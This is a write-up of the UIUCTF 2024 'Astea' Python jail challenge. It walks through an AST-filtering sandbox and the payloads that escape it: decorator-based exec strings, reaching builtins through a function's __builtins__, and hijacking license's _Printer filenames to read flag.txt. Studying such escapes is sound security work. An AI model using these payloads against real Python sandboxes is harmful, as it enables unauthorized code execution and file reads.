UIUCTF 2024 - Astea Writeup

·

11 min read

CategoryAuthorScoreSolves
MiscCameron47052
Description

I heard you can get sent to jail for refusing a cup of tea in England.

Introduction

Pyjails are a classic CTF formula. But this challenge doesn't just go for the classic "remove some characters that seem necessary", where the solution is some way of replacing them with much more code.

Instead, this pyjail is trying to solve the problem at a lower level - by censoring the generated AST. The full challenge code is as follows:

import ast

def safe_import():
  print("Why do you need imports to make tea?")

def safe_call():
  print("Why do you need function calls to make tea?")
class CoolDownTea(ast.NodeTransformer):
  def visit_Call(self, node: ast.Call) -> ast.AST:
    return ast.Call(func=ast.Name(id='safe_call', ctx=ast.Load()), args=[], keywords=[])

  def visit_Import(self, node: ast.AST) -> ast.AST:
    return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))

  def visit_ImportFrom(self, node: ast.ImportFrom) -> ast.AST:
    return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))

  def visit_Assign(self, node: ast.Assign) -> ast.AST:
    return ast.Assign(targets=node.targets, value=ast.Constant(value=0))

  def visit_BinOp(self, node: ast.BinOp) -> ast.AST:
    return ast.BinOp(left=ast.Constant(0), op=node.op, right=ast.Constant(0))
code = input('Nothing is quite like a cup of tea in the morning: ').splitlines()[0]

cup = ast.parse(code)
cup = CoolDownTea().visit(cup)
ast.fix_missing_locations(cup)
exec(compile(cup, '', 'exec'), {'__builtins__': {}}, {'safe_import': safe_import, 'safe_call': safe_call})

What we need to do

While there it's not explicitly called out, since we don't see a flag placeholder in the code it's reasonable to assume that we're looking to read some file, probably flag.txt. Seems simple enough.

What we can't do

Basically any exploration of this kind of a challenge will begin with a simple question: what's actually banned here?

Let's start with more standard parts before moving to our AST transformer. First, the result of the input instruction are stripped to just their first line:

code = input('Nothing is quite like a cup of tea in the morning: ').splitlines()[0]

And then, after going through our AST transformer, we run our code through exec without __builtins__ (but with our two "safe" functions added into locals):

exec(compile(cup, '', 'exec'), {'__builtins__': {}}, {'safe_import': safe_import, 'safe_call': safe_call})

Pretty basic stuff so far, so let's move onto the interesting bit the challenge gets its name from - our AST NodeTransformer. We can see that it modified 5 instructions, so to go through them in the order of subjective importance:

  1. Call
     def visit_Call(self, node: ast.Call) -> ast.AST:
         return ast.Call(func=ast.Name(id='safe_call', ctx=ast.Load()), args=[], keywords=[])
    
    Lack of function calls immediately jumps as one the main issues with this challenge. But it's important to note that it's not quite a no-op - any call is just redirected to call safe_call, so maybe we can modify it somewhat?
  2. Assign
     def visit_Assign(self, node: ast.Assign) -> ast.AST:
     return ast.Assign(targets=node.targets, value=ast.Constant(value=0))
    
    Putting a wrench in that idea is our second filter - we can't just assign things as we like. Any attempt will result in just 0 being assigned to our variable.
  3. BinOps
     def visit_BinOp(self, node: ast.BinOp) -> ast.AST:
     return ast.BinOp(left=ast.Constant(0), op=node.op, right=ast.Constant(0))
    
    And if lack of assignments wasn't enough - we can't even use our the basic pyjail method of adding short string together, since the name suggests that all operators with two operands will be banned similarly to our assignment roadblock. This means the classic string addition for indexing that's often a part of pyjails isn't really possible here.
  4. Imports

     def visit_Import(self, node: ast.AST) -> ast.AST:
         return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))
    
     def visit_ImportFrom(self, node: ast.ImportFrom) -> ast.AST:
         return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))
    

    And finally, we obviously also lose the ability to import anything. But since python provides a lot of ways to read files without imports, it's probably the least consequential limitation.

Solution

Where to start

We're dealing with Python's AST, so if you - like me - didn't memorize Python's abstract syntax grammar it's probably a good idea to start by learning a bit more about it and maybe even just looking at the definitions from the documentation. The most interesting part for us is obviously the inverse of our previous sections - is there anything interesting that isn't blocked? Well... To lead you through my train of thought here:

  • We can define functions and classes, only calling them is problematic. And the definitions have decorator_list argument:
      FunctionDef(identifier name, arguments args,
                         stmt* body, expr* decorator_list, expr? returns,
                         string? type_comment, type_param* type_params)
    
    So maybe decorators wouldn't be calls in the AST?
  • There aren't any limits on control flow, other than our one line requirement. Maybe something like match statements provides a way of calling functions without explicit calls in the AST? Or maybe there is some weird way of using exceptions that could help us?
  • we have formatted literals, and they do have at least some ways of unusual calling (e.g. !r for calling repr), so maybe they won't result in a Call expression?
  • BoolOps aren't blocked and even the comment above indicates they might use two values: -- BoolOp() can use left & right?
  • Typing appears in a separate section of the definition, so maybe we could just write some cursed python in types (like this)?
  • And finally, possibly the most important observation here, there are multiple types of Assigns - while our target code only blocks Assign we also have:
    AugAssign(expr target, operator op, expr value)
    
    And
    AnnAssign(expr target, expr annotation, expr? value, int simple)
    

Preparing for exploration

For this kind of python tasks and interactive environment provides a quick and easy way to experiment with different solutions. To make things a bit easier we can define a simple function that would allow us to get a textual representation of our (filtered) AST by using the ast.dump method with some fragments of code from the task:

def parse(code):
    cup = ast.parse(code)
    cup = CoolDownTea().visit(cup)
    ast.fix_missing_locations(cup)
    return ast.dump(cup)

So we can see that, for example, parse("open('flag.txt')") returns

Module(body=[Expr(value=Call(func=Name(id='safe_call', ctx=Load()), args=[], keywords=[]))], type_ignores=[])

So our simple call to open was replaced by safe_call.

Let's also define a function to test our code by actually executing it:

def jail_exec(code):
    cup = ast.parse(code)
    cup = CoolDownTea().visit(cup)
    ast.fix_missing_locations(cup)
    exec(compile(cup, '', 'exec'), {'__builtins__': {}}, {'safe_import': safe_import, 'safe_call': safe_call})

And as one can guess, jail_exec("open('flag.txt')") just ends up printing Why do you need function calls to make tea?

Actually solving the challenge

Attempt 1 - decorators

Decorators are wrapper functions, passed the function below them as an argument. So let's test if they're considered function calls:

parse("""
@print
def test(): pass
""")

This is essentially equivalent of print(test), but after parsing it we get

Module(body=[FunctionDef(name='test', args=arguments(posonlyargs=[], args=[], kwonlyargs=[], kw_defaults=[], defaults=[]), body=[Pass()], decorator_list=[Name(id='print', ctx=Load())], type_params=[])], type_ignores=[])

No safe_call! It seems we've found a solution! Now we just need to actually open and print the file with the restriction on arguments...

Thankfully our filtering doesn't see the contents of a string, so what if we just use exec ourselves? Well, we need a string to give it as an argument, but simple @"some string".format will give us just that. So something like

@exec
@"print(open('flag.txt').read())".format
def test(): pass

Seems like it should just work. And parsing it confirms the lack of filtered calls:

parse("""
@exec
@"print(open('flag.txt').read())".format
def test(): pass
""")
Module(body=[FunctionDef(name=\'test\', args=arguments(posonlyargs=[], args=[], kwonlyargs=[], kw_defaults=[], defaults=[]), body=[Pass()], decorator_list=[Name(id=\'exec\', ctx=Load()), Attribute(value=Constant(value="open(\'flag.txt\').read()"), attr=\'format\', ctx=Load())], type_params=[])], type_ignores=[])

But running it in our jail results in NameError: name 'exec' is not defined. And well, if you rememeber we don't have builtins! So just exec won't work. Fortunately, the reason sanitizing python is so hard is that we can just get it from somewhere. And that somewhere can even be one of our "safe" functions, e.g. safe_import.__builtins__["exec"].

We'll also need to do the same with our print and open, but that's just as simple:

@safe_import.__builtins__["exec"]
@'safe_import.__builtins__["print"](safe_import.__builtins__["open"]("flag.txt").read())'.format
def test(): pass

Which results in the following AST:

Module(body=[FunctionDef(name=\'test\', args=arguments(posonlyargs=[], args=[], kwonlyargs=[], kw_defaults=[], defaults=[]), body=[Pass()], decorator_list=[Subscript(value=Attribute(value=Name(id=\'safe_import\', ctx=Load()), attr=\'__builtins__\', ctx=Load()), slice=Constant(value=\'exec\'), ctx=Load()), Attribute(value=Constant(value=\'safe_import.__builtins__["print"](safe_import.__builtins__["open"]("flag.txt").read())\'), attr=\'format\', ctx=Load())], type_params=[])], type_ignores=[])

And seems to execute with our jail_exec just fine.

But when trying to execute with the full CTF code, we just get SyntaxError: invalid syntax! What gives?

Well, going back to our requirements - we have multiple lines! So how do we compress decorators to just one line? How does the syntax for defining functions even look in Python exactly?

Well, unfortunately finding it requires a slight bit of digging (which I'm not alone in complaining about - as seen in this tweet looking for the same docs), but when we finally find it we can see the important part at the start:

funcdef                   ::=  [decorators] "def" funcname [type_params] "(" [parameter_list] ")"
                               ["->" expression] ":" suite
decorators                ::=  decorator+
decorator                 ::=  "@" assignment_expression NEWLINE

So... It seems decorators need a newline... Well, that breaks our idea. So what else can we do?

Attempt 2 - string formatting

This will be a quick one, since we can see that the AST for something like f'{print()}' is

Module(body=[Expr(value=JoinedStr(values=[FormattedValue(value=Call(func=Name(id='safe_call', ctx=Load()), args=[], keywords=[]), conversion=-1)]))], type_ignores=[])

Which includes a Call. Our 'bypasses' in the form of !r, !s and !a, like in f'{()!r}' doesn't:

Module(body=[Expr(value=JoinedStr(values=[FormattedValue(value=Tuple(elts=[], ctx=Load()), conversion=114)]))], type_ignores=[])

But reading the documentation (e.g. even the AST docs) these three are all the specified conversions. So without being able to change the __repr__ or __str__ of some object we won't get anywhere, and if we can do that we don't even need f-strings...

Attempt 3 - different assigns

So let's go back what we noticed in AST - the assign limitation, that we can assume was placed there for a reason, can be bypassed.

So what are AugAssign and AnnAssign? Just a bit below the AST grammar definition we can find descriptions of node classes, so we can see that:

  • AugAssign is for Augmented Assignment - operations like +=, -=, *=, :=, etc.
  • `AnnAssign is an assignment with a type annotation. So things like a: int = 1

Of these, AnnAssign is basically just Assign. It's not like the annotations are something strictly checked. Just doing something trivial like a: 0 = "test" will confirm that we really don't need to care about this for our purposes.

So, what can we do with assigns?

Let's look at our Call filter again:

def visit_Call(self, node: ast.Call) -> ast.AST:
    return ast.Call(func=ast.Name(id='safe_call', ctx=ast.Load()), args=[], keywords=[])

All calls are redirected to a functions named safe_call, which is supposed to be harmless. But now that we have assigns, what would happen if we reassigned what's under that identifier? Let's quickly test that:

jail_exec("""safe_call: 0 = 1; safe_call()""")

And we get a TypeError: 'int' object is not callable - success! We changed the object we called!

Now, because of the replacement code, we don't have arguments. So we can't just make safe_call an exec or something that simple. We need to change it to a function that will somehow print a file we need without requiring any arguments...

_Printer objects

Have you ever wondered how license() or copyright() work? Well, they're actually a great tool for escaping pyjails, because they're both using just _Printer objects. And looking into the code behind them quickly reveals why it's so useful:

def __setup(self):
    if self.__lines:
        return
    data = None
    for filename in self.__filenames:
        try:
            with open(filename, encoding='utf-8') as fp:
                data = fp.read()
            break
        except OSError:
            pass
    if not data:
        data = self.__data
    self.__lines = data.split('\n')
    self.__linecnt = len(self.__lines)
[...]
def __call__(self):
    self.__setup()
    [...]

We're reading files! And these files don't come from arguments, but rather the __filenames property. So, if we can just set this to our target file and call license(), we're gonna get the contents of the file back.

And it really is almost that simple - just doing this:

license._Printer__filenames: 0 = ["flag.txt"];safe_call: 0 = license;license()

We're getting the following AST:

Module(body=[AnnAssign(target=Attribute(value=Name(id='license', ctx=Load()), attr='_Printer__filenames', ctx=Store()), annotation=Constant(value=0), value=List(elts=[Constant(value='flag.txt')], ctx=Load()), simple=0), AnnAssign(target=Name(id='safe_call', ctx=Store()), annotation=Constant(value=0), value=Name(id='license', ctx=Load()), simple=1), Expr(value=Call(func=Name(id='safe_call', ctx=Load()), args=[], keywords=[]))], type_ignores=[])

But unfortunately running it throws the familiar NameError: name 'license' is not defined.

We've seen that before though. So let's just use safe_import.__builtins__ again, for the final code that looks like this:

safe_import.__builtins__["license"]._Printer__filenames: 0 = ["flag.txt"];safe_call: 0 = safe_import.__builtins__["license"];license()

Results

Running our final code snippet after connecting to the challenge server (ncat --ssl astea.chal.uiuc.tf 1337) confirms that we have indeed solved the challenge and rewards us with the flag:

$ ncat --ssl astea.chal.uiuc.tf 1337
Nothing is quite like a cup of tea in the morning: safe_import.__builtins__["license"]._Printer__filenames: 0 = ["flag.txt"];safe_call: 0 = safe_import.__builtins__["license"];license()
uiuctf{maybe_we_shouldnt_sandbox_python_2691d6c1}

Afterword

As with basically all pyjail solutions, this is just one of many ways of solving it. I like _Printer, so that's what I went with - even without AnnAssign (we also have AugAssign, where especially the walrus operator can be very useful. I actually started tinkering with it before quickly realizing I can just override safe_call with AnnAssign).

Additionally, we can also access __global__ of our safe_call/safe_import functions, which adds some more options.

After the CTF it also turned out that there was a more direct issue with the node visitors - SDark noted on UIUCTF's Discord that they solved this challenge by abusing visit_Assign, which turns out to allow for bypassing the other filters by putting whatever you like on the left sign of assignments.

In summary, sandboxing Python is hell.

It also turned out this challenge wasn't as unique as I thought - GCTF 2022 had similar challenge (Treebox) that also filtered AST, but didn't require a single-line solution, which lead to the decorator use that I started with (though I only found about that task and writeups after coming up with a working solution... I think I might've even seen some writeup [maybe this?] and remembered the method but forgot where it came from :D).